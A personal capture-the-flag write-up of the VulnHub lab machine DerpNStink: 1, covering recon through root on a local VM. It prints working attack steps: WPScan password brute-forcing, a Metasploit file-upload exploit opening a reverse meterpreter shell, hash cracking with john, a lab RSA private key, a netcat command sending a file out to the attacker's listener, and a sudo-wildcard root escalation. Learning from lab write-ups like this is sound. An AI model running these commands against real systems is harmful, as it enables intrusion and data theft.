So this is my first writeup on a VulnHub image and it is called DerpNStink: 1
I know that this is a really famous machine and why you should bother about a writeup that is out there hundreds of times.
The reason is that I wanted to try it and see if my methodology and approach is similar to more experienced researchers. This is one the first machines I tried.
Also this writeup is really verbose (-vV) because I am not only interested in the flags but also on the mindset that I have to acquire, so feel free to leave a comment if you believe I’m getting something wrong.
Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…
So as usual I fire up Kali Linux and the DeRKnStiNK on VirtualBox and start the very first scans for information gathering.
First things first I run netdiscover to find all the devices connected to my home network.
netdiscover -r 192.168.2.0/24
So derpnstink is running on 192.168.2.8!
Next I run nmap to find open ports and identify the services running on them.
nmap -sV -T4 -O -F --version-light 192.168.1.8
So 3 services running on ports 21,22 and 80.
Really common services (FTP,SSH and HTTP) with HTTP being the most interesting because it will probably host a web application.
FTP is using vsftpd on a slightly outdated version (Sep 2012 – vsftpd-3.0.2) were the latest version is (Jul 2015 – vsftpd-3.0.3.)
Searchsploit returned a few exploits for vsftpd but for older versions (2.X.X)
So, nothing really fancy is going to happening here. Maybe we could try to brute-force the service but we will leave that for now as a worst case scenario.
I also tried to connect as anonymous user with the Metasploit aauxiliary with no luck (auxiliary/scanner/ftp/anonymous).
Now lets focus on the SSH service.
The version is version that is running (6.6.1p1) is not vulnerable to any public exploits.
Again nothing interesting here and we won’t try to bruteforce it (I hope so).
If we try to connect with SSH we get a Permission denied (publickey)
Moving to the most interesting part, the HTTP and port 80.
Lets start with Knockpy that is a python sub-domain scanner again based on a common sub-domain wordlist.
No luck here. No sub-domains exist.
Nikto will help us get a better idea about the web server and the web apps hosted.
nikro -h 192.168.2.8
Lets continue with Dirb, one of my favorite tools that scans for common sub-directories based on a wordlist.
(The -r parameter means to scan but not recursively because we don’t want to get lost an scan for hours each and every folder that might exist. For now we are only interested in level-0 folders)
dirb 192.168.1.8 -r
Really interesting stuff here.
Lets also run an auxiliary directory scanner from Metasploit that does the same job in case Dirb missed something.
use auxiliary/scanner/http/dir_scanner set RHOSTS 192.168.1.8 run
Actually Dirb did a better job here because the auxiliary scanner missed a few files and directories.
So, lets finally open 192.168.1.8 on the web browser.
An image of Mr.Derp and Uncle Stinky. No login , nothing interesting other than the cool visuals.
Lets view the pages source
Opening http://192.168.2.8/webnotes/ gives us useful information about system users, web directories and a local domain.
Opening http://192.168.2.8/webnotes/info.txt is even more interesting as it gives as a hint!
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
So we add to our /etc/hosts the following line
Scrolling further down to the source code of the home page we find our first flag!
Well that was easy. 4 to go.
http://192.168.2.8/robots.txt/ usually is really informative cause it is used to hide stuff from the Search Engines that actually care about robots.txt files.
Anyway, deadend. Both on /php/ and /temporary/
Browsing dirb results also is a dead end.
/weblog/ … on the other hand opens a new page!
It clearly a WordPress blog. Interesting
http://derpnstink.local/weblog/wp-admin/ loads fine. That is convenient for us, not for derp though.
So it is time to use WPScan.
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.
These are the plugin options that we are currently interested.
--enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must write  chars) p plugins vp only vulnerable plugins ap all plugins (can take a long time) tt timthumbs t themes vt only vulnerable themes at all themes (can take a long time) cb Config backups dbe Database exports Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins If no option is supplied, the default is "vt,tt,u,vp"
We will try to enumerate vulnerable plugins,themes, users, the viral timthumb vulnerability and also config backups and DB exports.
wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe
WPScan returned some naaasty staff about this WordPress installation
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.4.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _______________________________________________________________ [+] URL: http://derpnstink.local/weblog/ [+] Started: Fri Jan 4 14:19:12 2019 Interesting Finding(s): [+] http://derpnstink.local/weblog/ | Interesting Entries: | - Server: Apache/2.4.7 (Ubuntu) | - X-Powered-By: PHP/5.5.9-1ubuntu4.22 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://derpnstink.local/weblog/xmlrpc.php | Found By: Headers (Passive Detection) | Confidence: 100% | Confirmed By: | - Link Tag (Passive Detection), 30% confidence | - Direct Access (Aggressive Detection), 100% confidence | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://derpnstink.local/weblog/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] WordPress version 4.6.13 identified (Latest, released on 2018-12-13). | Detected By: Emoji Settings (Passive Detection) | - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.13' | Confirmed By: Meta Generator (Passive Detection) | - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.13' [+] WordPress theme in use: twentysixteen | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/ | Last Updated: 2018-12-19T00:00:00.000Z | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 1.7 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13 | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Detected By: Css Style (Passive Detection) | | Version: 1.3 (80% confidence) | Detected By: Style (Passive Detection) | - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13, Match: 'Version: 1.3' [+] Enumerating Vulnerable Plugins [+] Checking Plugin Versions [i] Plugin(s) Identified: [+] slideshow-gallery | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/ | Last Updated: 2018-11-15T11:14:00.000Z | [!] The version is out of date, the latest version is 1.6.9 | | Detected By: Urls In Homepage (Passive Detection) | | [!] 4 vulnerabilities identified: | | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload | Fixed in: 1.4.7 | References: | - https://wpvulndb.com/vulnerabilities/7532 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460 | - https://www.exploit-db.com/exploits/34681/ | - https://www.exploit-db.com/exploits/34514/ | - http://seclists.org/bugtraq/2014/Sep/1 | - http://packetstormsecurity.com/files/131526/ | - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload | | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) | Fixed in: 126.96.36.199 | References: | - https://wpvulndb.com/vulnerabilities/8263 | - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html | - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html | | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) | Fixed in: 1.6.5 | References: | - https://wpvulndb.com/vulnerabilities/8786 | - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html | - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery | | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) | Fixed in: 1.6.6 | References: | - https://wpvulndb.com/vulnerabilities/8795 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946 | - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf | - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf | | Version: 1.4.6 (100% confidence) | Detected By: Readme - Stable Tag (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt [+] Enumerating Vulnerable Themes Checking Known Locations - Time: 00:00:01 <=====================================================================> (288 / 288) 100.00% Time: 00:00:01 [+] Checking Theme Versions [i] No themes Found. [+] Enumerating Timthumbs Checking Known Locations - Time: 00:00:12 <===================================================================> (2573 / 2573) 100.00% Time: 00:00:12 [i] No Timthumbs Found. [+] Enumerating Config Backups Checking Config Backups - Time: 00:00:00 <========================================================================> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Enumerating DB Exports Checking DB Exports - Time: 00:00:00 <============================================================================> (36 / 36) 100.00% Time: 00:00:00 [i] No DB Exports Found. [+] Enumerating Users Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] unclestinky | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] admin | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Finished: Fri Jan 4 14:19:46 2019 [+] Requests Done: 2921 [+] Cached Requests: 55 [+] Data Sent: 670.18 KB [+] Data Received: 1.375 MB [+] Memory used: 83.152 MB [+] Elapsed time: 00:00:34
PHP version seems outdated with a few interesting CVEs but for now lets focus on the WordPress stuff.
WordPress version is also outdated but nothing exploitable.
WPScan found 4 vulnerable plugins!
The first is Slideshow Gallery < 1.4.7 Arbitrary File Upload that supports a Metasploit module with an excelent rank. Awesome!! The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type. The bad thing is that the exploit requires an authenticated user. Lets see if we can register a low privileged user. http://derpnstink.local/weblog/wp-login.php?action=register Anddd nop! Registration for users is disabled.
WPScan has already found users by the way (unclestinky,admin) so maybe we can try for common passwords on them.
So lets brute force them
But we need a wordlist.
Thankfully Kali has a few decent wordlists built-in on the following dir
I like gunzip rockyou.txt.gz
So lets unzip it
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/rockyou.txt --max-threads 25
Well I think maybe the rockyou.txt is an overkill
Even WPScan can’t calculate the needed time to exhaust the list.
Lets try a smaller one.
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt
Aaaand success! That was crazy-easy. We could have found it even manually actually.
Lets login to WordPress with username: admin password: admin
Didn’t find anything useful other that the vulnerable plugin and many options on the WordPress menu where hidden even if we where connected as an administrator. Trying to view other pages like wp-admin/options-general.php returns an error “Sorry, you are not allowed to access this page.” Something is wrong here.
WPScan found another user “unclestinky” but didn’t crack the password.
Lets login to WordPress with username: unclestinky password: unclestinky
Lets use the admin user for the metasploit exploit.
set RHOST 192.168.2.8 use exploit/unix/webapp/wp_slideshowgallery_upload set TARGETURI /weblog set WP_USER admin set WP_PASSWORD admin check
192.168.2.8:80 – The target appears to be vulnerable.
msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit [*] Started reverse TCP handler on 192.168.2.9:4444 [*] Trying to login as admin [*] Trying to upload payload [*] Uploading payload [*] Calling uploaded file xtgeaywf.php [*] Sending stage (38247 bytes) to 192.168.2.8 [*] Meterpreter session 2 opened (192.168.2.9:4444 -> 192.168.2.8:48812) at 2019-01-05 13:55:17 -0500 [+] Deleted xtgeaywf.php
So we got a meterpreter shell pretty easy as user www-data.
meterpreter > sysinfo Computer : DeRPnStiNK OS : Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 Meterpreter : php/linux
Viewing the current directory files with ls returns a strange file named elidumfy.php file that contains a payload from another user that tried to hack derpnstinky! lol
meterpreter > ls Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery ================================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 4096 dir 2017-11-12 22:43:29 -0500 cache 100644/rw-r--r-- 108987 fil 2017-11-12 22:45:12 -0500 derp.png 100644/rw-r--r-- 1114 fil 2017-12-12 16:44:11 -0500 elidumfy.php
We continue to browse the directories with meterpreter.
Editing wp-config.php provides us valuable information to connect to the database.
Outsite /weblog directory we will try to visit the directories that we found at the beginning with dirb that returned error 403.
Editing info.php on /var/www/html/php returns interesting stuff
meterpreter > ls Listing: /var/www/html/php ========================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100644/rw-r--r-- 72 fil 2018-01-09 12:33:24 -0500 info.php
We could do some nasty staff with meterpreter but for now lets focus on phpMyAdmin.
After successful login with username: root password: mysql we can view all the databases.
Searching on table information_schema the string “flag” returned an interesting result in the wordpress database.
Searching again with “flag” returned us the 2nd flag of the machine in the wp_posts table.
2 to go
Lets view the registered users in wp_users table.
It would be nice if we could login as “unclestinky” to WordPress but as far as I know cracking a WordPress salting password won’t be that easy so why not just replace the hash with the “admin” user that we already know that is “admin”. Before we do that lets keep a backup of the salted hash in case we will need it later.
And now we can easily login with username: unclestinky password: admin
Nothing interesting though.
Back to meterpreter shell and browsing the filesystem
returns mrderp, stinky with bin/bash access
Continuing to /home directories /home/stinky and /home/derp and trying to view them unfortunately returns permission error as we are using the shell as user www-data.
At that point I must admit that I was kinda lost.
I am still really novice at this and especially on linux file system and where to look for interesting things or flags.
I have still 2 flags to go and I am sure the /home directory is full of secrets.
So port 21, 22, 80. I had some fun with port 80 but 21 and 22 are still really quiet.
usernames found: admin, mrderp, stinky
Tried manually to login with SSH but password logins are disabled. Also tried guessing FTP passwords with no luck.
Lost valuable time.
It is time to bruteforce the salted hash of wordpress user unclestinky and hope that he uses the same password on ssh or ftp.
john --wordlist=/usr/share/wordlists/rockyou.txt unclestinky_wp_hash.txt
And we finally have the password! wedgie57
Username on WordPress was “unclestinky” but we know from previous information gathering (http://192.168.2.8/webnotes/) that for the Linux system is “stinky”
And we have successfully connected with ftp as “stinky”
200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 1001 1001 4096 Nov 12 2017 network-logs drwxr-xr-x 3 1001 1001 4096 Nov 12 2017 ssh -rwxr-xr-x 1 0 0 17 Nov 12 2017 test.txt drwxr-xr-x 2 0 0 4096 Nov 12 2017 tmp 226 Directory send OK.
Switching to browser for better browsing.
In the file ftp://192.168.2.8/files/network-logs/derpissues.txt there are a few chatlogs from stinky and derp.
“12:07 stinky: im gonna packet capture so we can figure out whats going on”
Stinky mentions about a packet capture file so we might need to keep that info in mind as a hint.
We will probably have to analyze a .pcap file.
Not so well hidden in the following directory, luckily for us we found a private RSA key.
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4 2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f 5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4 ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0 DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7 VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br 7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8 gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7 RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1 14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o -----END RSA PRIVATE KEY-----
We create a file with the RSA key on the following directory ~/.ssh/id_rsa and then we try to login.
ssh -i key.txt firstname.lastname@example.org
chmod 700 key.txt
And we are in as email@example.com
We browse the directories
And we got the 3rd flag!
Also in Documents folder a derpissues.pcap is waiting to be wiresharked!
I didn’t know how to get the my local machine. I tried to move it to the /var/www dir to download it but I didn’t have the right permissions.
So after googling I found a solution using netcat.
We listen to port 31337 on kali for the file derpissues.pcap
nc -l -p 31337 > derpissues.pcap
And we send it as a gift from derp
nc 192.168.2.9 31337 < derpissues.pcap
We are probably interested in http post requests on wp-login.php so we filter the results accordingly.
Luckily for us the site is not using an SSL so passwords are send in plain-text.
No luck on that post request though because we already know that password.
And we got the password for derp!
And we are in!
Browsing the directories for flag4.
The file /home/mrderp/Desktop/helpdesk.log contains a support ticket that contains too much text and a pastebin link: https://pastebin.com/RzK9WfGw
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
So I had to google ALOT to find out what that means.
Long story short, everything that runs on /home/mrderp/binaries/ with a name derpyXXX.XXX will run with full privileges.
Lets create a bash shell as derpysfuckingawesomebashshell.sh
mkdir binaries nano derpysfuckingawesomebashshell.sh
#!/bin/bash bash -i
And we are root!
Last flag was on /root/Desktop/flag.txt
mrDerp and UncleStinky got rooted
Don’t forget to change /var/www/html/temporary/index.html from “try harder!” to “I tried harder!!!”
So this was really fun and I learned a lot of new things.
Multiple vulnerabilities were found and were exploited in order to finally gain root access.
I must say that although it was kinda challenging for me, this situation is far away from any real world scenario. Still good practice to sharpen my skills and I hope that I can deal with more advanced machines in the near future.